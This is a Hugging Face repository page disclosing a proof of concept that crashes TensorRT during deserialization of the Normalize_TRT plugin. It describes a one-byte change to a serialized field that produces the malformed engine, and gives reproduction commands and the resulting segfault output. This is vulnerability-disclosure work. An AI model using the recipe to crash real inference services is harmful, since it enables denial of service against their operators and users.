How to use from the
Use from the
TensorRT library
# Gated model: Login with a HF token with gated access permission
hf auth login
# No code snippets available yet for this library.

# To use this model, check the repository files and the library's documentation.

# Want to help? PRs adding snippets are welcome at:
# https://github.com/huggingface/huggingface.js

You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

TensorRT Normalize_TRT Deserialization DoS PoC

This repository contains a TensorRT .engine proof-of-concept for a model file deserialization crash in the built-in Normalize_TRT plugin.

The malformed engine differs from the valid control engine by one byte: the serialized Normalize_TRT mWeights.count field is changed from 1 to 2. When standard TensorRT plugins are registered and the malformed engine is loaded, TensorRT reaches Normalize::Normalize(void const* buffer, size_t length), logs a failed length validation at normalizePlugin.cpp:80, and then the process exits with SIGSEGV.

Files

  • normalize_malformed_count.engine: malformed PoC engine.
  • normalize_valid_control.engine: valid control engine built from the same network.
  • reproduce.py: minimal loader that initializes standard TensorRT plugins and deserializes the engine.
  • requirements.txt: Python package version used during local validation.

Reproduction

Tested with TensorRT 10.16.1.11.

python3 -m venv venv
./venv/bin/python -m pip install -r requirements.txt
./venv/bin/python reproduce.py normalize_valid_control.engine
./venv/bin/python reproduce.py normalize_malformed_count.engine

Expected behavior:

$ ./venv/bin/python reproduce.py normalize_valid_control.engine
engine_host_code_allowed=False
loaded=True

$ ./venv/bin/python reproduce.py normalize_malformed_count.engine
engine_host_code_allowed=False
[TRT] [F] Validation failed: d == a + length
/_src/plugin/normalizePlugin/normalizePlugin.cpp:80
[TRT] [E] std::exception
Segmentation fault

The crash requires the standard TensorRT plugin registry to be initialized. Without plugin initialization, TensorRT fails cleanly because it cannot find Normalize_TRT:

./venv/bin/python reproduce.py --no-init-plugins normalize_malformed_count.engine

Expected clean failure:

engine_host_code_allowed=False
[TRT] [E] ... Cannot find plugin: Normalize_TRT, version: 1 ...
loaded=False

Hashes

82157f8a49985e3cd942381c54bdc1dd05b8d369bbb2faef6fd0f619c5b31e97  normalize_valid_control.engine
0c528c8f9f3a471ffb47208499f4b00ebc5cbc17f72667785726e89135cb4694  normalize_malformed_count.engine

Scope

This PoC demonstrates reliable denial of service during TensorRT engine deserialization. It does not demonstrate arbitrary code execution.

Downloads last month
-
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support